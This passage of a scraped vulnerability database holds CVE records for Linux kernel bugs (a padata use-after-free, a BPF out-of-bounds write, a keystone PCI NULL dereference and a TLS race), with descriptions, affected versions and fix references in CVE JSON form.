void serial(struct padata_priv *padata) {
struct request *request = container_of(padata,
struct request,
padata);
complete(request->done);
}
void user_function() {
DECLARE_COMPLETION(done)
padata->parallel = parallel;
padata->serial = serial;
padata_do_parallel();
wait_for_completion(&done);
padata_free_shell();
}
```
In the corresponding padata.c file, there's the following code:
```c
static void padata_serial_worker(struct work_struct *serial_work) {
...
cnt = 0;
while (!list_empty(&local_list)) {
...
padata->serial(padata);
cnt++;
}
local_bh_enable();
if (refcount_sub_and_test(cnt, &pd->refcnt))
padata_free_pd(pd);
}
```
Because of the high system load and the accumulation of unexecuted
softirq at this moment, `local_bh_enable()` in padata takes longer
to execute than usual. Subsequently, when accessing `pd->refcnt`,
`pd` has already been released by `padata_free_shell()`, resulting
in a UAF issue with `pd->refcnt`.
The fix is straightforward: add `refcount_dec_and_test` before calling
`padata_free_pd` in `padata_free_shell`.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 07928d9bfc81640bab36f5190e8725894d93b659 Version: 07928d9bfc81640bab36f5190e8725894d93b659 Version: 07928d9bfc81640bab36f5190e8725894d93b659 Version: 07928d9bfc81640bab36f5190e8725894d93b659 Version: 07928d9bfc81640bab36f5190e8725894d93b659 Version: 07928d9bfc81640bab36f5190e8725894d93b659 Version: 13721e447acc2b82c19cf72e9e6c4291c77693ed Version: 7a2ccb65f90168edc2348495bb56093c466ffa39 Version: 928cf3d733c4efc221e1a78b14cb2ee066627260 Version: c9da8ee1491719001a444f4af688b75e72b58418 Version: dc34710a7aba5207e7cb99d11588c04535b3c53d Version: 5fefc9b3e3584a1ce98da27c38e1b8dda1939d74 Version: 26daf8e6515c2dcd25d235468420b9f46e0acdac |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52854",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-22T18:22:41.019729Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:36.501Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:36.064Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/41aad9d6953984d134fc50f631f24ef476875d4d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0dd34a7ad395dbcf6ae60e48e9786050e25b9bc5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c7c26d0ef5d20f00dbb2ae3befcabbe0efa77275"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1e901bcb8af19416b65f5063a4af7996e5a51d7f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1734a79e951914f1db2c65e635012a35db1c674b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7ddc21e317b360c3444de3023bcc83b85fabae2f"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/padata.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "41aad9d6953984d134fc50f631f24ef476875d4d",
"status": "affected",
"version": "07928d9bfc81640bab36f5190e8725894d93b659",
"versionType": "git"
},
{
"lessThan": "0dd34a7ad395dbcf6ae60e48e9786050e25b9bc5",
"status": "affected",
"version": "07928d9bfc81640bab36f5190e8725894d93b659",
"versionType": "git"
},
{
"lessThan": "c7c26d0ef5d20f00dbb2ae3befcabbe0efa77275",
"status": "affected",
"version": "07928d9bfc81640bab36f5190e8725894d93b659",
"versionType": "git"
},
{
"lessThan": "1e901bcb8af19416b65f5063a4af7996e5a51d7f",
"status": "affected",
"version": "07928d9bfc81640bab36f5190e8725894d93b659",
"versionType": "git"
},
{
"lessThan": "1734a79e951914f1db2c65e635012a35db1c674b",
"status": "affected",
"version": "07928d9bfc81640bab36f5190e8725894d93b659",
"versionType": "git"
},
{
"lessThan": "7ddc21e317b360c3444de3023bcc83b85fabae2f",
"status": "affected",
"version": "07928d9bfc81640bab36f5190e8725894d93b659",
"versionType": "git"
},
{
"status": "affected",
"version": "13721e447acc2b82c19cf72e9e6c4291c77693ed",
"versionType": "git"
},
{
"status": "affected",
"version": "7a2ccb65f90168edc2348495bb56093c466ffa39",
"versionType": "git"
},
{
"status": "affected",
"version": "928cf3d733c4efc221e1a78b14cb2ee066627260",
"versionType": "git"
},
{
"status": "affected",
"version": "c9da8ee1491719001a444f4af688b75e72b58418",
"versionType": "git"
},
{
"status": "affected",
"version": "dc34710a7aba5207e7cb99d11588c04535b3c53d",
"versionType": "git"
},
{
"status": "affected",
"version": "5fefc9b3e3584a1ce98da27c38e1b8dda1939d74",
"versionType": "git"
},
{
"status": "affected",
"version": "26daf8e6515c2dcd25d235468420b9f46e0acdac",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/padata.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.201",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.139",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.63",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.5.*",
"status": "unaffected",
"version": "6.5.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.7",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.201",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.139",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.63",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.5.12",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.2",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.16.84",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.172",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.103",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npadata: Fix refcnt handling in padata_free_shell()\n\nIn a high-load arm64 environment, the pcrypt_aead01 test in LTP can lead\nto system UAF (Use-After-Free) issues. Due to the lengthy analysis of\nthe pcrypt_aead01 function call, I\u0027ll describe the problem scenario\nusing a simplified model:\n\nSuppose there\u0027s a user of padata named `user_function` that adheres to\nthe padata requirement of calling `padata_free_shell` after `serial()`\nhas been invoked, as demonstrated in the following code:\n\n```c\nstruct request {\n struct padata_priv padata;\n struct completion *done;\n};\n\nvoid parallel(struct padata_priv *padata) {\n do_something();\n}\n\nvoid serial(struct padata_priv *padata) {\n struct request *request = container_of(padata,\n \t\t\t\tstruct request,\n\t\t\t\tpadata);\n complete(request-\u003edone);\n}\n\nvoid user_function() {\n DECLARE_COMPLETION(done)\n padata-\u003eparallel = parallel;\n padata-\u003eserial = serial;\n padata_do_parallel();\n wait_for_completion(\u0026done);\n padata_free_shell();\n}\n```\n\nIn the corresponding padata.c file, there\u0027s the following code:\n\n```c\nstatic void padata_serial_worker(struct work_struct *serial_work) {\n ...\n cnt = 0;\n\n while (!list_empty(\u0026local_list)) {\n ...\n padata-\u003eserial(padata);\n cnt++;\n }\n\n local_bh_enable();\n\n if (refcount_sub_and_test(cnt, \u0026pd-\u003erefcnt))\n padata_free_pd(pd);\n}\n```\n\nBecause of the high system load and the accumulation of unexecuted\nsoftirq at this moment, `local_bh_enable()` in padata takes longer\nto execute than usual. Subsequently, when accessing `pd-\u003erefcnt`,\n`pd` has already been released by `padata_free_shell()`, resulting\nin a UAF issue with `pd-\u003erefcnt`.\n\nThe fix is straightforward: add `refcount_dec_and_test` before calling\n`padata_free_pd` in `padata_free_shell`."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:49:42.224Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/41aad9d6953984d134fc50f631f24ef476875d4d"
},
{
"url": "https://git.kernel.org/stable/c/0dd34a7ad395dbcf6ae60e48e9786050e25b9bc5"
},
{
"url": "https://git.kernel.org/stable/c/c7c26d0ef5d20f00dbb2ae3befcabbe0efa77275"
},
{
"url": "https://git.kernel.org/stable/c/1e901bcb8af19416b65f5063a4af7996e5a51d7f"
},
{
"url": "https://git.kernel.org/stable/c/1734a79e951914f1db2c65e635012a35db1c674b"
},
{
"url": "https://git.kernel.org/stable/c/7ddc21e317b360c3444de3023bcc83b85fabae2f"
}
],
"title": "padata: Fix refcnt handling in padata_free_shell()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52854",
"datePublished": "2024-05-21T15:31:49.235Z",
"dateReserved": "2024-05-21T15:19:24.256Z",
"dateUpdated": "2025-05-04T12:49:42.224Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-0500 (GCVE-0-2022-0500)
Vulnerability from cvelistv5
Published
2022-03-25 18:03
Modified
2024-08-02 23:32
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
A flaw was found in unrestricted eBPF usage by the BPF_BTF_LOAD, leading to a possible out-of-bounds memory write in the Linux kernel’s BPF subsystem due to the way a user loads BTF. This flaw allows a local user to crash or escalate their privileges on the system.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:32:46.009Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2044578"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=20b2aff4bc15bda809f994761d5719827d66c0b4"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=216e3cd2f28dbbf1fe86848e0e29e6693b9f0a20"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=34d3a78c681e8e7844b43d1a2f4671a04249c821"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c4807322660d4290ac9062c034aed6b87243861"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=48946bd6a5d695c50b34546864b79c1f910a33c1"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c25b2ae136039ffa820c26138ed4a5e5f3ab3841"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cf9f2f8d62eca810afbd1ee6cc0800202b000e57"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20220519-0001/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "kernel",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "Linux kernel 5.17-rc1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in unrestricted eBPF usage by the BPF_BTF_LOAD, leading to a possible out-of-bounds memory write in the Linux kernel\u2019s BPF subsystem due to the way a user loads BTF. This flaw allows a local user to crash or escalate their privileges on the system."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-119",
"description": "CWE-119",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-05-19T19:06:16",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2044578"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=20b2aff4bc15bda809f994761d5719827d66c0b4"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=216e3cd2f28dbbf1fe86848e0e29e6693b9f0a20"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=34d3a78c681e8e7844b43d1a2f4671a04249c821"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c4807322660d4290ac9062c034aed6b87243861"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=48946bd6a5d695c50b34546864b79c1f910a33c1"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c25b2ae136039ffa820c26138ed4a5e5f3ab3841"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cf9f2f8d62eca810afbd1ee6cc0800202b000e57"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://security.netapp.com/advisory/ntap-20220519-0001/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secalert@redhat.com",
"ID": "CVE-2022-0500",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "kernel",
"version": {
"version_data": [
{
"version_value": "Linux kernel 5.17-rc1"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A flaw was found in unrestricted eBPF usage by the BPF_BTF_LOAD, leading to a possible out-of-bounds memory write in the Linux kernel\u2019s BPF subsystem due to the way a user loads BTF. This flaw allows a local user to crash or escalate their privileges on the system."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-119"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://bugzilla.redhat.com/show_bug.cgi?id=2044578",
"refsource": "MISC",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2044578"
},
{
"name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=20b2aff4bc15bda809f994761d5719827d66c0b4",
"refsource": "MISC",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=20b2aff4bc15bda809f994761d5719827d66c0b4"
},
{
"name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=216e3cd2f28dbbf1fe86848e0e29e6693b9f0a20",
"refsource": "MISC",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=216e3cd2f28dbbf1fe86848e0e29e6693b9f0a20"
},
{
"name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=34d3a78c681e8e7844b43d1a2f4671a04249c821",
"refsource": "MISC",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=34d3a78c681e8e7844b43d1a2f4671a04249c821"
},
{
"name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c4807322660d4290ac9062c034aed6b87243861",
"refsource": "MISC",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c4807322660d4290ac9062c034aed6b87243861"
},
{
"name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=48946bd6a5d695c50b34546864b79c1f910a33c1",
"refsource": "MISC",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=48946bd6a5d695c50b34546864b79c1f910a33c1"
},
{
"name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c25b2ae136039ffa820c26138ed4a5e5f3ab3841",
"refsource": "MISC",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c25b2ae136039ffa820c26138ed4a5e5f3ab3841"
},
{
"name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cf9f2f8d62eca810afbd1ee6cc0800202b000e57",
"refsource": "MISC",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cf9f2f8d62eca810afbd1ee6cc0800202b000e57"
},
{
"name": "https://security.netapp.com/advisory/ntap-20220519-0001/",
"refsource": "CONFIRM",
"url": "https://security.netapp.com/advisory/ntap-20220519-0001/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2022-0500",
"datePublished": "2022-03-25T18:03:03",
"dateReserved": "2022-02-04T00:00:00",
"dateUpdated": "2024-08-02T23:32:46.009Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43823 (GCVE-0-2024-43823)
Vulnerability from cvelistv5
Published
2024-08-17 09:21
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
PCI: keystone: Fix NULL pointer dereference in case of DT error in ks_pcie_setup_rc_app_regs()
If IORESOURCE_MEM is not provided in Device Tree due to
any error, resource_list_first_type() will return NULL and
pci_parse_request_of_pci_ranges() will just emit a warning.
This will cause a NULL pointer dereference. Fix this bug by adding NULL
return check.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43823",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:08:54.421311Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:24.690Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/pci/controller/dwc/pci-keystone.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "bbba48ad67c53feea05936ea1e029dcca8057506",
"status": "affected",
"version": "0f71c60ffd26943fa9646aa73ad7889ace116ce2",
"versionType": "git"
},
{
"lessThan": "0a6f1b5fe8ef8268aaa069035639968ceeea0a23",
"status": "affected",
"version": "0f71c60ffd26943fa9646aa73ad7889ace116ce2",
"versionType": "git"
},
{
"lessThan": "dbcdd1863ba2ec9b76ec131df25d797709e05597",
"status": "affected",
"version": "0f71c60ffd26943fa9646aa73ad7889ace116ce2",
"versionType": "git"
},
{
"lessThan": "a231707a91f323af1e5d9f1722055ec2fc1c7775",
"status": "affected",
"version": "0f71c60ffd26943fa9646aa73ad7889ace116ce2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/pci/controller/dwc/pci-keystone.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: keystone: Fix NULL pointer dereference in case of DT error in ks_pcie_setup_rc_app_regs()\n\nIf IORESOURCE_MEM is not provided in Device Tree due to\nany error, resource_list_first_type() will return NULL and\npci_parse_request_of_pci_ranges() will just emit a warning.\n\nThis will cause a NULL pointer dereference. Fix this bug by adding NULL\nreturn check.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:03.668Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bbba48ad67c53feea05936ea1e029dcca8057506"
},
{
"url": "https://git.kernel.org/stable/c/0a6f1b5fe8ef8268aaa069035639968ceeea0a23"
},
{
"url": "https://git.kernel.org/stable/c/dbcdd1863ba2ec9b76ec131df25d797709e05597"
},
{
"url": "https://git.kernel.org/stable/c/a231707a91f323af1e5d9f1722055ec2fc1c7775"
}
],
"title": "PCI: keystone: Fix NULL pointer dereference in case of DT error in ks_pcie_setup_rc_app_regs()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43823",
"datePublished": "2024-08-17T09:21:43.843Z",
"dateReserved": "2024-08-17T09:11:59.271Z",
"dateUpdated": "2025-05-04T09:27:03.668Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26583 (GCVE-0-2024-26583)
Vulnerability from cvelistv5
Published
2024-02-21 14:59
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tls: fix race between async notify and socket close
The submitting thread (one which called recvmsg/sendmsg)
may exit as soon as the async crypto handler calls complete()
so any code past that point risks touching already freed data.
Try to avoid the locking and extra flags altogether.
Have the main thread hold an extra reference, this way
we can depend solely on the atomic ref counter for
synchronization.
Don't futz with reiniting the completion, either, we are now
tightly controlling when completion fires.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 0cada33241d9de205522e3858b18e506ca5cce2c Version: 0cada33241d9de205522e3858b18e506ca5cce2c Version: 0cada33241d9de205522e3858b18e506ca5cce2c Version: 0cada33241d9de205522e3858b18e506ca5cce2c Version: 0cada33241d9de205522e3858b18e506ca5cce2c Version: cf4cc95a15f599560c7abd89095a7973a4b9cec3 Version: 9b81d43da15e56ed89f083f326561acdcaf549ce |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26583",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-22T16:41:40.480459Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:01.043Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.779Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f17d21ea73918ace8afb9c2d8e734dbf71c2c9d7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a3ca06d04d589deec81f56229a9a9d62352ce01"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/86dc27ee36f558fe223dbdfbfcb6856247356f4a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6209319b2efdd8524691187ee99c40637558fa33"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aec7961916f3f9e88766e2688992da6980f11b8d"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/tls.h",
"net/tls/tls_sw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f17d21ea73918ace8afb9c2d8e734dbf71c2c9d7",
"status": "affected",
"version": "0cada33241d9de205522e3858b18e506ca5cce2c",
"versionType": "git"
},
{
"lessThan": "7a3ca06d04d589deec81f56229a9a9d62352ce01",
"status": "affected",
"version": "0cada33241d9de205522e3858b18e506ca5cce2c",
"versionType": "git"
},
{
"lessThan": "86dc27ee36f558fe223dbdfbfcb6856247356f4a",
"status": "affected",
"version": "0cada33241d9de205522e3858b18e506ca5cce2c",
"versionType": "git"
},
{
"lessThan": "6209319b2efdd8524691187ee99c40637558fa33",
"status": "affected",
"version": "0cada33241d9de205522e3858b18e506ca5cce2c",
"versionType": "git"
},
{
"lessThan": "aec7961916f3f9e88766e2688992da6980f11b8d",
"status": "affected",
"version": "0cada33241d9de205522e3858b18e506ca5cce2c",
"versionType": "git"
},
{
"status": "affected",
"version": "cf4cc95a15f599560c7abd89095a7973a4b9cec3",
"versionType": "git"
},
{
"status": "affected",
